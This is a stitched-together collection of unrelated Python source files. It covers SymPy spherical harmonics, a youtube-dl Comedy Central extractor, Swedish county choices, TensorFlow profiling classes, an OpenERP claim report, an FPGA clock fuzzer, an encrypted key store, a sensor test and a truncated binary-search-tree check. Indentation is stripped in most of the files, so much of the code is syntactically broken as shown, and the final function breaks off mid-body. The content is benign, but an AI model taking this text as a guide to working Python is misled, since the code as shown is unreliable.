m*cot(theta)*Ynm(n, m, theta, phi) + sqrt((-m + n)*(m + n + 1))*exp(-I*phi)*Ynm(n, m + 1, theta, phi)
>>> diff(Ynm(n, m, theta, phi), phi)
I*m*Ynm(n, m, theta, phi)
Further we can compute the complex conjugation
>>> from sympy import Ynm, Symbol, conjugate
>>> from sympy.abc import n,m
>>> theta = Symbol("theta")
>>> phi = Symbol("phi")
>>> conjugate(Ynm(n, m, theta, phi))
(-1)**(2*m)*exp(-2*I*m*phi)*Ynm(n, m, theta, phi)
    To get back the well-known expressions in spherical
coordinates we use full expansion
>>> from sympy import Ynm, Symbol, expand_func
>>> from sympy.abc import n,m
>>> theta = Symbol("theta")
>>> phi = Symbol("phi")
>>> expand_func(Ynm(n, m, theta, phi))
sqrt((2*n + 1)*factorial(-m + n)/factorial(m + n))*exp(I*m*phi)*assoc_legendre(n, m, cos(theta))/(2*sqrt(pi))
See Also
========
Ynm_c, Znm
References
==========
.. [1] http://en.wikipedia.org/wiki/Spherical_harmonics
.. [2] http://mathworld.wolfram.com/SphericalHarmonic.html
.. [3] http://functions.wolfram.com/Polynomials/SphericalHarmonicY/
.. [4] http://dlmf.nist.gov/14.30
"""
@classmethod
def eval(cls, n, m, theta, phi):
n, m, theta, phi = [sympify(x) for x in (n, m, theta, phi)]
# Handle negative index m and arguments theta, phi
if m.could_extract_minus_sign():
m = -m
return S.NegativeOne**m * exp(-2*I*m*phi) * Ynm(n, m, theta, phi)
if theta.could_extract_minus_sign():
theta = -theta
return Ynm(n, m, theta, phi)
if phi.could_extract_minus_sign():
phi = -phi
return exp(-2*I*m*phi) * Ynm(n, m, theta, phi)
        # TODO Add more simplification here
def _eval_expand_func(self, **hints):
n, m, theta, phi = self.args
rv = (sqrt((2*n + 1)/(4*pi) * factorial(n - m)/factorial(n + m)) *
exp(I*m*phi) * assoc_legendre(n, m, cos(theta)))
# We can do this because of the range of theta
return rv.subs(sqrt(-cos(theta)**2 + 1), sin(theta))
def fdiff(self, argindex=4):
if argindex == 1:
# Diff wrt n
raise ArgumentIndexError(self, argindex)
elif argindex == 2:
# Diff wrt m
raise ArgumentIndexError(self, argindex)
elif argindex == 3:
# Diff wrt theta
n, m, theta, phi = self.args
return (m * cot(theta) * Ynm(n, m, theta, phi) +
sqrt((n - m)*(n + m + 1)) * exp(-I*phi) * Ynm(n, m + 1, theta, phi))
elif argindex == 4:
# Diff wrt phi
n, m, theta, phi = self.args
return I * m * Ynm(n, m, theta, phi)
else:
raise ArgumentIndexError(self, argindex)
def _eval_rewrite_as_polynomial(self, n, m, theta, phi):
# TODO: Make sure n \in N
        # TODO: Assert |m| <= n otherwise we should return 0
return self.expand(func=True)
def _eval_rewrite_as_sin(self, n, m, theta, phi):
return self.rewrite(cos)
def _eval_rewrite_as_cos(self, n, m, theta, phi):
# This method can be expensive due to extensive use of simplification!
from sympy.simplify import simplify, trigsimp
# TODO: Make sure n \in N
        # TODO: Assert |m| <= n otherwise we should return 0
term = simplify(self.expand(func=True))
# We can do this because of the range of theta
term = term.xreplace({Abs(sin(theta)):sin(theta)})
return simplify(trigsimp(term))
def _eval_conjugate(self):
# TODO: Make sure theta \in R and phi \in R
n, m, theta, phi = self.args
return S.NegativeOne**m * self.func(n, -m, theta, phi)
def as_real_imag(self, deep=True, **hints):
# TODO: Handle deep and hints
n, m, theta, phi = self.args
re = (sqrt((2*n + 1)/(4*pi) * factorial(n - m)/factorial(n + m)) *
cos(m*phi) * assoc_legendre(n, m, cos(theta)))
im = (sqrt((2*n + 1)/(4*pi) * factorial(n - m)/factorial(n + m)) *
sin(m*phi) * assoc_legendre(n, m, cos(theta)))
return (re, im)
def _eval_evalf(self, prec):
# Note: works without this function by just calling
# mpmath for Legendre polynomials. But using
# the dedicated function directly is cleaner.
from mpmath import mp, workprec
from sympy import Expr
n = self.args[0]._to_mpmath(prec)
m = self.args[1]._to_mpmath(prec)
theta = self.args[2]._to_mpmath(prec)
phi = self.args[3]._to_mpmath(prec)
with workprec(prec):
res = mp.spherharm(n, m, theta, phi)
return Expr._from_mpmath(res, prec)
def _sage_(self):
import sage.all as sage
return sage.spherical_harmonic(self.args[0]._sage_(),
self.args[1]._sage_(),
self.args[2]._sage_(),
self.args[3]._sage_())
def Ynm_c(n, m, theta, phi):
r"""Conjugate spherical harmonics defined as
.. math::
\overline{Y_n^m(\theta, \varphi)} := (-1)^m Y_n^{-m}(\theta, \varphi)
See Also
========
Ynm, Znm
References
==========
.. [1] http://en.wikipedia.org/wiki/Spherical_harmonics
.. [2] http://mathworld.wolfram.com/SphericalHarmonic.html
.. [3] http://functions.wolfram.com/Polynomials/SphericalHarmonicY/
"""
from sympy import conjugate
return conjugate(Ynm(n, m, theta, phi))
class Znm(Function):
r"""
Real spherical harmonics defined as
.. math::
Z_n^m(\theta, \varphi) :=
\begin{cases}
\frac{Y_n^m(\theta, \varphi) + \overline{Y_n^m(\theta, \varphi)}}{\sqrt{2}} &\quad m > 0 \\
Y_n^m(\theta, \varphi) &\quad m = 0 \\
\frac{Y_n^m(\theta, \varphi) - \overline{Y_n^m(\theta, \varphi)}}{i \sqrt{2}} &\quad m < 0 \\
\end{cases}
which gives in simplified form
.. math::
Z_n^m(\theta, \varphi) =
\begin{cases}
\frac{Y_n^m(\theta, \varphi) + (-1)^m Y_n^{-m}(\theta, \varphi)}{\sqrt{2}} &\quad m > 0 \\
Y_n^m(\theta, \varphi) &\quad m = 0 \\
\frac{Y_n^m(\theta, \varphi) - (-1)^m Y_n^{-m}(\theta, \varphi)}{i \sqrt{2}} &\quad m < 0 \\
\end{cases}
See Also
========
Ynm, Ynm_c
References
==========
.. [1] http://en.wikipedia.org/wiki/Spherical_harmonics
.. [2] http://mathworld.wolfram.com/SphericalHarmonic.html
.. [3] http://functions.wolfram.com/Polynomials/SphericalHarmonicY/
"""
@classmethod
def eval(cls, n, m, theta, phi):
n, m, th, ph = [sympify(x) for x in (n, m, theta, phi)]
if m.is_positive:
zz = (Ynm(n, m, th, ph) + Ynm_c(n, m, th, ph)) / sqrt(2)
return zz
elif m.is_zero:
return Ynm(n, m, th, ph)
elif m.is_negative:
zz = (Ynm(n, m, th, ph) - Ynm_c(n, m, th, ph)) / (sqrt(2)*I)
return zz
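# A quick sanity check of the m = 0 case (matches the Ynm examples above):
#
#     >>> from sympy import Symbol, simplify
#     >>> theta, phi = Symbol("theta"), Symbol("phi")
#     >>> simplify(Znm(1, 0, theta, phi).expand(func=True))
#     sqrt(3)*cos(theta)/(2*sqrt(pi))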
|
from __future__ import unicode_literals
import re
from .mtv import MTVServicesInfoExtractor
from ..compat import (
compat_str,
compat_urllib_parse,
)
from ..utils import (
ExtractorError,
float_or_none,
unified_strdate,
)
class ComedyCentralIE(MTVServicesInfoExtractor):
_VALID_URL = r'''(?x)https?://(?:www\.)?cc\.com/
(video-clips|episodes|cc-studios|video-collections|full-episodes)
/(?P<title>.*)'''
_FEED_URL = 'http://comedycentral.com/feeds/mrss/'
_TEST = {
'url': 'http://www.cc.com/video-clips/kllhuv/stand-up-greg-fitzsimmons--uncensored---too-good-of-a-mother',
'md5': 'c4f48e9eda1b16dd10add0744344b6d8',
'info_dict': {
'id': 'cef0cbb3-e776-4bc9-b62e-8016deccb354',
'ext': 'mp4',
'title': 'CC:Stand-Up|Greg Fitzsimmons: Life on Stage|Uncensored - Too Good of a Mother',
'description': 'After a certain point, breastfeeding becomes c**kblocking.',
},
}
class ComedyCentralShowsIE(MTVServicesInfoExtractor):
IE_DESC = 'The Daily Show / The Colbert Report'
# urls can be abbreviations like :thedailyshow
# urls for episodes like:
# or urls for clips like: http://www.thedailyshow.com/watch/mon-december-10-2012/any-given-gun-day
# or: http://www.colbertnation.com/the-colbert-report-videos/421667/november-29-2012/moon-shattering-news
# or: http://www.colbertnation.com/the-colbert-report-collections/422008/festival-of-lights/79524
_VALID_URL = r'''(?x)^(:(?P<shortname>tds|thedailyshow)
                          |https?://(?:www\.)?
(?P<showname>thedailyshow|thecolbertreport)\.(?:cc\.)?com/
((?:full-)?episodes/(?:[0-9a-z]{6}/)?(?P<episode>.*)|
(?P<clip>
(?:(?:guests/[^/]+|videos|video-playlists|special-editions|news-team/[^/]+)/[^/]+/(?P<videotitle>[^/?#]+))
|(the-colbert-report-(videos|collections)/(?P<clipID>[0-9]+)/[^/]*/(?P<cntitle>.*?))
|(watch/(?P<date>[^/]*)/(?P<tdstitle>.*))
)|
(?P<interview>
extended-interviews/(?P<interID>[0-9a-z]+)/
(?:playlist_tds_extended_)?(?P<interview_title>[^/?#]*?)
(?:/[^/?#]?|[?#]|$))))
'''
_TESTS = [{
'url': 'http://thedailyshow.cc.com/watch/thu-december-13-2012/kristen-stewart',
'md5': '4e2f5cb088a83cd8cdb7756132f9739d',
'info_dict': {
'id': 'ab9ab3e7-5a98-4dbe-8b21-551dc0523d55',
'ext': 'mp4',
'upload_date': '20121213',
'description': 'Kristen Stewart learns to let loose in "On the Road."',
'uploader': 'thedailyshow',
'title': 'thedailyshow kristen-stewart part 1',
}
}, {
'url': 'http://thedailyshow.cc.com/extended-interviews/b6364d/sarah-chayes-extended-interview',
'info_dict': {
'id': 'sarah-chayes-extended-interview',
'description': 'Carnegie Endowment Senior Associate Sarah Chayes discusses how corrupt institutions function throughout the world in her book "Thieves of State: Why Corruption Threatens Global Security."',
'title': 'thedailyshow Sarah Chayes Extended Interview',
},
'playlist': [
{
'info_dict': {
'id': '0baad492-cbec-4ec1-9e50-ad91c291127f',
'ext': 'mp4',
'upload_date': '20150129',
'description': 'Carnegie Endowment Senior Associate Sarah Chayes discusses how corrupt institutions function throughout the world in her book "Thieves of State: Why Corruption Threatens Global Security."',
'uploader': 'thedailyshow',
'title': 'thedailyshow sarah-chayes-extended-interview part 1',
},
},
{
'info_dict': {
'id': '1e4fb91b-8ce7-4277-bd7c-98c9f1bbd283',
'ext': 'mp4',
'upload_date': '20150129',
'description': 'Carnegie Endowment Senior Associate Sarah Chayes discusses how corrupt institutions function throughout the world in her book "Thieves of State: Why Corruption Threatens Global Security."',
'uploader': 'thedailyshow',
'title': 'thedailyshow sarah-chayes-extended-interview part 2',
},
},
],
'params': {
'skip_download': True,
},
}, {
'url': 'http://thedailyshow.cc.com/extended-interviews/xm3fnq/andrew-napolitano-extended-interview',
'only_matching': True,
}, {
'url': 'http://thecolbertreport.cc.com/videos/29w6fx/-realhumanpraise-for-fox-news',
'only_matching': True,
}, {
'url': 'http://thecolbertreport.cc.com/videos/gh6urb/neil-degrasse-tyson-pt--1?xrs=eml_col_031114',
'only_matching': True,
}, {
'url': 'http://thedailyshow.cc.com/guests/michael-lewis/3efna8/exclusive---michael-lewis-extended-interview-pt--3',
'only_matching': True,
}, {
'url': 'http://thedailyshow.cc.com/episodes/sy7yv0/april-8--2014---denis-leary',
'only_matching': True,
}, {
'url': 'http://thecolbertreport.cc.com/episodes/8ase07/april-8--2014---jane-goodall',
'only_matching': True,
}, {
'url': 'http://thedailyshow.cc.com/video-playlists/npde3s/the-daily-show-19088-highlights',
'only_matching': True,
}, {
'url': 'http://thedailyshow.cc.com/video-playlists/t6d9sg/the-daily-show-20038-highlights/be3cwo',
'only_matching': True,
}, {
'url': 'http://thedailyshow.cc.com/special-editions/2l8fdb/special-edition---a-look-back-at-food',
'only_matching': True,
}, {
'url': 'http://thedailyshow.cc.com/news-team/michael-che/7wnfel/we-need-to-talk-about-israel',
'only_matching': True,
}]
_available_formats = ['3500', '2200', '1700', '1200', '750', '400']
_video_extensions = {
'3500': 'mp4',
'2200': 'mp4',
'1700': 'mp4',
'1200': 'mp4',
'750': 'mp4',
'400': 'mp4',
}
_video_dimensions = {
'3500': (1280, 720),
'2200': (960, 540),
'1700': (768, 432),
'1200': (640, 360),
'750': (512, 288),
'400': (384, 216),
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
if mobj.group('shortname'):
if mobj.group('shortname') in ('tds', 'thedailyshow'):
url = 'http://thedailyshow.cc.com/full-episodes/'
else:
url = 'http://thecolbertreport.cc.com/full-episodes/'
mobj = re.match(self._VALID_URL, url, re.VERBOSE)
assert mobj is not None
if mobj.group('clip'):
if mobj.group('videotitle'):
epTitle = mobj.group('videotitle')
elif mobj.group('showname') == 'thedailyshow':
epTitle = mobj.group('tdstitle')
else:
epTitle = mobj.group('cntitle')
dlNewest = False
elif mobj.group('interview'):
epTitle = mobj.group('interview_title')
dlNewest = False
else:
dlNewest = not mobj.group('episode')
if dlNewest:
epTitle = mobj.group('showname')
else:
epTitle = mobj.group('episode')
show_name = mobj.group('showname')
webpage, htmlHandle = self._download_webpage_handle(url, epTitle)
if dlNewest:
url = htmlHandle.geturl()
mobj = re.match(self._VALID_URL, url, re.VERBOSE)
if mobj is None:
raise ExtractorError('Invalid redirected URL: ' + url)
if mobj.group('episode') == '':
raise ExtractorError('Redirected URL is still not specific: ' + url)
epTitle = (mobj.group('episode') or mobj.group('videotitle')).rpartition('/')[-1]
mMovieParams = re.findall('(?:<param name="movie" value="|var url = ")(http://media.mtvnservices.com/([^"]*(?:episode|video).*?:.*?))"', webpage)
if len(mMovieParams) == 0:
            # The Colbert Report embeds the information in a data-mgid
            # attribute without a URL prefix, so extract the alternate
            # reference and then add the URL prefix manually.
altMovieParams = re.findall('data-mgid="([^"]*(?:episode|video|playlist).*?:.*?)"', webpage)
if len(altMovieParams) == 0:
raise ExtractorError('unable to find Flash URL in webpage ' + url)
else:
mMovieParams = [("http://media.mtvnservices.com/" + altMovieParams[0], altMovieParams[0])]
uri = mMovieParams[0][1]
        # Strip a spurious '.cc' before '.com' in the uri
        # (e.g. 'episode:xxx.cc.com' -> 'episode:xxx.com').
uri = re.sub(r'(episode:[^.]+)(\.cc)?\.com', r'\1.com', uri)
index_url = 'http://%s.cc.com/feeds/mrss?%s' % (show_name, compat_urllib_parse.urlencode({'uri': uri}))
idoc = self._download_xml(
index_url, epTitle,
'Downloading show index', 'Unable to download episode index')
title = idoc.find('./channel/title').text
description = idoc.find('./channel/description').text
entries = []
item_els = idoc.findall('.//item')
for part_num, itemEl in enumerate(item_els):
upload_date = unified_strdate(itemEl.findall('./pubDate')[0].text)
thumbnail = itemEl.find('.//{http://search.yahoo.com/mrss/}thumbnail').attrib.get('url')
content = itemEl.find('.//{http://search.yahoo.com/mrss/}content')
duration = float_or_none(content.attrib.get('duration'))
mediagen_url = content.attrib['url']
guid = itemEl.find('./guid').text.rpartition(':')[-1]
cdoc = self._download_xml(
mediagen_url, epTitle,
'Downloading configuration for segment %d / %d' % (part_num + 1, len(item_els)))
turls = []
for rendition in cdoc.findall('.//rendition'):
finfo = (rendition.attrib['bitrate'], rendition.findall('./src')[0].text)
turls.append(finfo)
formats = []
for format, rtmp_video_url in turls:
w, h = self._video_dimensions.get(format, (None, None))
formats.append({
'format_id': 'vhttp-%s' % format,
'url': self._transform_rtmp_url(rtmp_video_url),
'ext': self._video_extensions.get(format, 'mp4'),
'height': h,
'width': w,
})
formats.append({
'format_id': 'rtmp-%s' % format,
'url': rtmp_video_url.replace('viacomccstrm', 'viacommtvstrm'),
'ext': self._video_extensions.get(format, 'mp4'),
'height': h,
'width': w,
})
self._sort_formats(formats)
subtitles = self._extract_subtitles(cdoc, guid)
virtual_id = show_name + ' ' + epTitle + ' part ' + compat_str(part_num + 1)
entries.append({
'id': guid,
'title': virtual_id,
'formats': formats,
'uploader': show_name,
'upload_date': upload_date,
'duration': duration,
'thumbnail': thumbnail,
'description': description,
'subtitles': subtitles,
})
return {
'_type': 'playlist',
'id': epTitle,
'entries': entries,
'title': show_name + ' ' + title,
'description': description,
}
|
"""
An alphabetical list of Swedish counties, sorted by codes.
http://en.wikipedia.org/wiki/Counties_of_Sweden
This exists in this standalone file so that it's only imported into memory
when explicitly needed.
"""
from __future__ import unicode_literals
from django.utils.translation import ugettext_lazy as _
COUNTY_CHOICES = (
('AB', _('Stockholm')),
('AC', _('Västerbotten')),
('BD', _('Norrbotten')),
('C', _('Uppsala')),
('D', _('Södermanland')),
('E', _('Östergötland')),
('F', _('Jönköping')),
('G', _('Kronoberg')),
('H', _('Kalmar')),
('I', _('Gotland')),
('K', _('Blekinge')),
('M', _('Skåne')),
('N', _('Halland')),
('O', _('Västra Götaland')),
('S', _('Värmland')),
('T', _('Örebro')),
('U', _('Västmanland')),
('W', _('Dalarna')),
('X', _('Gävleborg')),
('Y', _('Västernorrland')),
('Z', _('Jämtland')),
)
|
import document_page_show_diff
|
"""Data structures and algorithms for profiling information."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
class ProfileDatum(object):
"""Profile data point."""
def __init__(self,
device_name,
node_exec_stats,
file_path,
line_number,
func_name,
op_type):
"""Constructor.
Args:
device_name: (string) name of the device.
node_exec_stats: `NodeExecStats` proto.
file_path: path to the source file involved in creating the op.
line_number: line number in the file involved in creating the op.
func_name: name of the function that the line belongs to.
op_type: (string) Operation type.
"""
self.device_name = device_name
self.node_exec_stats = node_exec_stats
self.file_path = file_path
self.line_number = line_number
self.func_name = func_name
if self.file_path:
self.file_line_func = "%s:%d(%s)" % (
os.path.basename(self.file_path), self.line_number, self.func_name)
else:
self.file_line_func = ""
self.op_type = op_type
self.start_time = self.node_exec_stats.all_start_micros
self.op_time = (self.node_exec_stats.op_end_rel_micros -
self.node_exec_stats.op_start_rel_micros)
@property
def exec_time(self):
"""Op execution time plus pre- and post-processing."""
return self.node_exec_stats.all_end_rel_micros
class AggregateProfile(object):
"""Profile summary data for aggregating a number of ProfileDatum."""
def __init__(self, profile_datum):
"""Constructor.
Args:
profile_datum: (`ProfileDatum`) an instance of `ProfileDatum` to
initialize this object with.
"""
self.total_op_time = profile_datum.op_time
self.total_exec_time = profile_datum.exec_time
device_and_node = "%s:%s" % (profile_datum.device_name,
profile_datum.node_exec_stats.node_name)
self._node_to_exec_count = {device_and_node: 1}
def add(self, profile_datum):
"""Accumulate a new instance of ProfileDatum.
Args:
profile_datum: (`ProfileDatum`) an instance of `ProfileDatum` to
accumulate to this object.
"""
self.total_op_time += profile_datum.op_time
self.total_exec_time += profile_datum.exec_time
    device_and_node = "%s:%s" % (profile_datum.device_name,
                                 profile_datum.node_exec_stats.node_name)
if device_and_node in self._node_to_exec_count:
self._node_to_exec_count[device_and_node] += 1
else:
self._node_to_exec_count[device_and_node] = 1
@property
def node_count(self):
return len(self._node_to_exec_count)
@property
def node_exec_count(self):
return sum(self._node_to_exec_count.values())
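# A minimal sketch of aggregating two identical data points. NodeExecStats is
# normally a protobuf; a stub object carrying the referenced fields suffices
# for illustration:
#
#   class _StubStats(object):
#     node_name = "MatMul"
#     all_start_micros = 0
#     op_start_rel_micros = 1
#     op_end_rel_micros = 5
#     all_end_rel_micros = 7
#
#   datum = ProfileDatum("/gpu:0", _StubStats(), "model.py", 42,
#                        "forward", "MatMul")
#   agg = AggregateProfile(datum)
#   agg.add(datum)
#   print(agg.node_count, agg.node_exec_count)  # prints: 1 2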
|
from openerp.osv import fields,osv
from openerp import tools
AVAILABLE_PRIORITIES = [
('0', 'Low'),
('1', 'Normal'),
('2', 'High')
]
class crm_claim_report(osv.osv):
""" CRM Claim Report"""
_name = "crm.claim.report"
_auto = False
_description = "CRM Claim Report"
_columns = {
'user_id':fields.many2one('res.users', 'User', readonly=True),
'section_id':fields.many2one('crm.case.section', 'Section', readonly=True),
'nbr': fields.integer('# of Claims', readonly=True), # TDE FIXME master: rename into nbr_claims
'company_id': fields.many2one('res.company', 'Company', readonly=True),
'create_date': fields.datetime('Create Date', readonly=True, select=True),
'claim_date': fields.datetime('Claim Date', readonly=True),
        'delay_close': fields.float('Delay to close', digits=(16, 2), readonly=True, group_operator="avg", help="Number of Days to close the case"),
        'stage_id': fields.many2one('crm.case.stage', 'Stage', readonly=True, domain="[('section_ids','=',section_id)]"),
'categ_id': fields.many2one('crm.case.categ', 'Category',\
domain="[('section_id','=',section_id),\
('object_id.model', '=', 'crm.claim')]", readonly=True),
'partner_id': fields.many2one('res.partner', 'Partner', readonly=True),
'priority': fields.selection(AVAILABLE_PRIORITIES, 'Priority'),
'type_action': fields.selection([('correction','Corrective Action'),('prevention','Preventive Action')], 'Action Type'),
'date_closed': fields.datetime('Close Date', readonly=True, select=True),
'date_deadline': fields.date('Deadline', readonly=True, select=True),
        'delay_expected': fields.float('Overpassed Deadline', digits=(16, 2), readonly=True, group_operator="avg"),
        'email': fields.integer('# Emails', readonly=True),
'subject': fields.char('Claim Subject', readonly=True)
}
def init(self, cr):
""" Display Number of cases And Section Name
@param cr: the current row, from the database cursor,
"""
tools.drop_view_if_exists(cr, 'crm_claim_report')
cr.execute("""
create or replace view crm_claim_report as (
select
min(c.id) as id,
c.date as claim_date,
c.date_closed as date_closed,
c.date_deadline as date_deadline,
c.user_id,
c.stage_id,
c.section_id,
c.partner_id,
c.company_id,
c.categ_id,
c.name as subject,
count(*) as nbr,
c.priority as priority,
c.type_action as type_action,
c.create_date as create_date,
avg(extract('epoch' from (c.date_closed-c.create_date)))/(3600*24) as delay_close,
(SELECT count(id) FROM mail_message WHERE model='crm.claim' AND res_id=c.id) AS email,
extract('epoch' from (c.date_deadline - c.date_closed))/(3600*24) as delay_expected
from
crm_claim c
group by c.date,\
c.user_id,c.section_id, c.stage_id,\
c.categ_id,c.partner_id,c.company_id,c.create_date,
c.priority,c.type_action,c.date_deadline,c.date_closed,c.id
)""")
|
import csv
import numpy as np
from utils import util
from utils.clock_utils import make_bufg, MAX_GLOBAL_CLOCKS
from prjuray.db import Database
CMT_XY_FUN = util.create_xy_fun('')
def print_top(seed):
np.random.seed(seed)
db = Database(util.get_db_root(), util.get_part())
grid = db.grid()
site_to_tile = {}
site_to_site_type = {}
for tile_name in sorted(grid.tiles()):
loc = grid.loc_of_tilename(tile_name)
gridinfo = grid.gridinfo_at_loc(loc)
for site, site_type in gridinfo.sites.items():
site_to_site_type[site] = site_type
site_to_tile[site] = tile_name
bufce_row_drivers = {}
with open('../active_bufce_row.csv') as f:
for row in csv.DictReader(f):
tile = site_to_tile[row['site']]
gridinfo = grid.gridinfo_at_tilename(tile)
if gridinfo.tile_type == 'CMT_RIGHT':
continue
clock_region = CMT_XY_FUN(row['site_clock_region'])
key = clock_region, int(row['hdistr_number'])
assert key not in bufce_row_drivers
bufce_row_drivers[key] = row['site']
bufg_drivers = {}
with open('../bufg_outputs.csv') as f:
for row in csv.DictReader(f):
if row['hroute_output'] == 'all':
continue
clock_region = CMT_XY_FUN(row['clock_region'])
key = clock_region, int(row['hroute_output'])
assert key not in bufg_drivers
bufg_drivers[key] = row['site']
clock_regions = set()
for clock_region, _ in bufce_row_drivers.keys():
clock_regions.add(clock_region)
for clock_region, _ in bufg_drivers.keys():
clock_regions.add(clock_region)
print("""
module top();
""")
for hroute in range(MAX_GLOBAL_CLOCKS):
if np.random.randint(2):
continue
select_clock_regions = sorted(clock_regions)
np.random.shuffle(select_clock_regions)
bufg = None
        while select_clock_regions:
clock_region = select_clock_regions.pop()
key = clock_region, hroute
if key in bufg_drivers:
bufg = bufg_drivers[key]
break
if bufg is None:
continue
sel_x, sel_y = clock_region
clock_regions_for_bufg = []
for x, y in clock_regions:
if y == sel_y:
clock_regions_for_bufg.append((x, y))
clock_regions_for_bufg.sort()
np.random.shuffle(clock_regions_for_bufg)
bufce_row = None
        while clock_regions_for_bufg:
clock_region = clock_regions_for_bufg.pop()
key = clock_region, hroute
if key in bufce_row_drivers:
bufce_row = bufce_row_drivers[key]
break
if bufce_row is None:
continue
bufg_s, bufg_o_wire = make_bufg(
site=bufg,
site_type=site_to_site_type[bufg],
idx=hroute,
ce_inputs=['1'],
randlib=np.random)
print(bufg_s)
print("""
(* LOC="{loc}", KEEP, DONT_TOUCH *) BUFCE_ROW row{idx} (
.I({bufg_o_wire})
);""".format(
loc=bufce_row,
idx=hroute,
bufg_o_wire=bufg_o_wire,
))
print('endmodule')
with open('complete_top.tcl', 'w') as f:
print(
"""
write_checkpoint -force design_reset.dcp
close_design
open_checkpoint design_reset.dcp
route_design
""",
file=f)
|
"""
controlbeast.keystore.handler
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: Copyright 2013 by the ControlBeast team, see AUTHORS.
:license: ISC, see LICENSE for details.
"""
from collections import UserDict
import os
import tempfile
import yaml
from controlbeast.keystore.plain import CbKsPlain
from controlbeast.keystore.crypto import CbKsCrypto
from controlbeast.keystore.exception import CbKsPasswordError
class CbKeyStore(UserDict):
"""
Key store handler.
A key store is similar to a normal Python dictionary, except it offers persistence
by storing its content - optionally encrypted - within a file. Since YAML is used
for serialisation, a key store is limited to contents which can be represented in
YAML, such as strings, numbers, and other serializable objects.
If no ``file`` argument is passed, the key store resorts to using a temporary file
which will be deleted as soon as the key store object is destroyed.
If no ``password`` argument is passed, the key store will not encrypt its serialized
representation within the file.
.. warning::
The synchronisation behaviour of this key store class is mostly unidirectional, meaning
it will take into account the file backend's content only at the moment when the key store
object is created. If the backend file is changed by any other means (a second key store
object, an external text editor, ...), the key store will not take into account these
changes, but overwrite them with the next update on its own data.
Therefore, it is highly recommended to
* never create two key store objects operating on the same file
* use key store objects in an environment preponderantly using read-only access
* when using key store objects in :py:mod:`multiprocessing` or :py:mod:`threading` environments,
implement appropriate synchronisation mechanisms (although this will not protect from completely
external changes to the backend file)
:param str file: path to file already containing or intended to contain the key store
:param str passphrase: Passphrase to derive the key from, if key store should be encrypted
"""
    #: flag signalling whether this store is temporary or not
    _tmp = False
    #: flag signalling whether this store is read-only or not
    _read_only = False
def __init__(self, file='', passphrase='', dict=None, **kwargs):
"""
Key store constructor
"""
if file:
self._file = file
self._tmp = False
else:
fp, self._file = tempfile.mkstemp()
os.close(fp)
self._tmp = True
if passphrase:
self._backend = CbKsCrypto(file=self._file, passphrase=passphrase)
else:
self._backend = CbKsPlain(file=self._file)
self._read_only = self._backend.read_only
if self._backend.plaintext:
try:
data = yaml.safe_load(self._backend.plaintext)
except yaml.YAMLError:
self._read_only = True
data = {}
else:
data = {}
        # Illegal read, e.g. due to a wrong or invalid password
if self._backend.return_code != os.EX_OK:
if 'bad decrypt' in self._backend.stderr:
raise CbKsPasswordError(filename=self._file)
if dict is not None and self._read_only is not True:
data.update(dict)
super(CbKeyStore, self).__init__(dict=data, **kwargs)
def __setitem__(self, key, item):
"""
Overrides default ``__setitem__`` method. Functionality is identical, except data are synced to the
backend after executing the data update.
"""
if not self._read_only:
super(CbKeyStore, self).__setitem__(key, item)
self._sync()
else:
raise TypeError("This key store is read-only.")
def __delitem__(self, key):
"""
Overrides default ``__delitem__`` method. Functionality is identical, except data are synced to the
backend after executing the data update.
"""
if not self._read_only:
super(CbKeyStore, self).__delitem__(key)
self._sync()
else:
raise TypeError("This key store is read-only.")
def __del__(self):
"""
Clean up when object gets de-referenced
"""
if self._tmp:
os.unlink(self._file)
def _sync(self):
"""
Synchronize current data into the backend. This method is called every time the data stored in
this key store are modified.
"""
if not self._read_only:
self._backend.plaintext = yaml.dump(self.data, default_flow_style=False)
else:
raise TypeError("This key store is read-only.")
@property
def read_only(self):
"""
Boolean indicating whether the key store is read-only or not
"""
return self._read_only
@read_only.setter
def read_only(self, value):
if value:
self._read_only = True
@property
def file(self):
"""
Path of the file used as backend
"""
return self._file
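# Usage sketch (hypothetical path and passphrase):
#
#     ks = CbKeyStore(file='/tmp/demo.store', passphrase='secret')
#     ks['host'] = 'example.org'   # synced (encrypted) to the file at once
#     del ks['host']               # also synced immediately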
|
"""
@file test_magnet_mag3110.py
"""
import os
import time
from oeqa.utils.helper import shell_cmd
from oeqa.oetest import oeRuntimeTest
from EnvirSetup import EnvirSetup
from oeqa.utils.decorators import tag
@tag(TestType="FVT", FeatureID="IOTOS-757")
class TestMagnetMAG3110(oeRuntimeTest):
"""
@class TestMagnetMAG3110
"""
def setUp(self):
'''Generate test app on target
@fn setUp
@param self
@return'''
print 'start!\n'
#connect sensor and DUT through board
#shell_cmd("sudo python "+ os.path.dirname(__file__) + "/Connector.py mag3110")
envir = EnvirSetup(self.target)
envir.envirSetup("mag3110","magnet")
def tearDown(self):
'''unload mag3110 driver
@fn tearDown
@param self
@return'''
(status, output) = self.target.run("cat /sys/devices/virtual/dmi/id/board_name")
if "Minnow" in output:
(status, output) = self.target.run(
"cd /sys/bus/i2c/devices; \
echo 0x0e >i2c-1/delete_device")
if "Galileo" in output:
(status, output) = self.target.run(
"cd /sys/bus/i2c/devices; \
echo 0x0e >i2c-0/delete_device")
def test_Magnet_MAG3110(self):
'''Execute the test app and verify sensor data
@fn test_Magnet_MAG3110
@param self
@return'''
print 'start reading data!'
(status, output) = self.target.run(
"chmod 777 /opt/apps/test_magnet_mag3110.fbp")
(status, output) = self.target.run(
"cd /opt/apps; ./test_magnet_mag3110.fbp >re.log")
error = output
(status, output) = self.target.run(
"cp /opt/apps/re.log /home/root/mag3110.log")
#verification of target sensor data
(status, output) = self.target.run("cat /opt/apps/re.log|grep direction-vector")
print output + "\n"
self.assertEqual(status, 0, msg="Error messages: %s" % error)
#make sure sensor data is valid
(status, output) = self.target.run("cat /opt/apps/re.log|grep '0.000000, 0.000000, 0.000000'")
self.assertEqual(status, 1, msg="Error messages: %s" % output)
|
class Node:
def __init__(self, val=None):
self.left, self.right, self.val = None, None, val
INFINITY = float("infinity")
NEG_INFINITY = float("-infinity")
def isBST(tree, minVal=NEG_INFINITY, maxVal=INFINITY):
if tree is None:
return True
if not minVal <= tree.val <= maxVal:
return False
return isBST(tree.left, minVal, tree.val) and \
isBST(tree.right, tree.val, maxVal)
def isBST2(tree, lastNode=None):
    # Avoid a mutable default argument, which would leak state across calls.
    if lastNode is None:
        lastNode = [NEG_INFINITY]
    if tree is None:
        return True
if not isBST2(tree.left, lastNode):
return False
if tree.val < lastNode[0]:
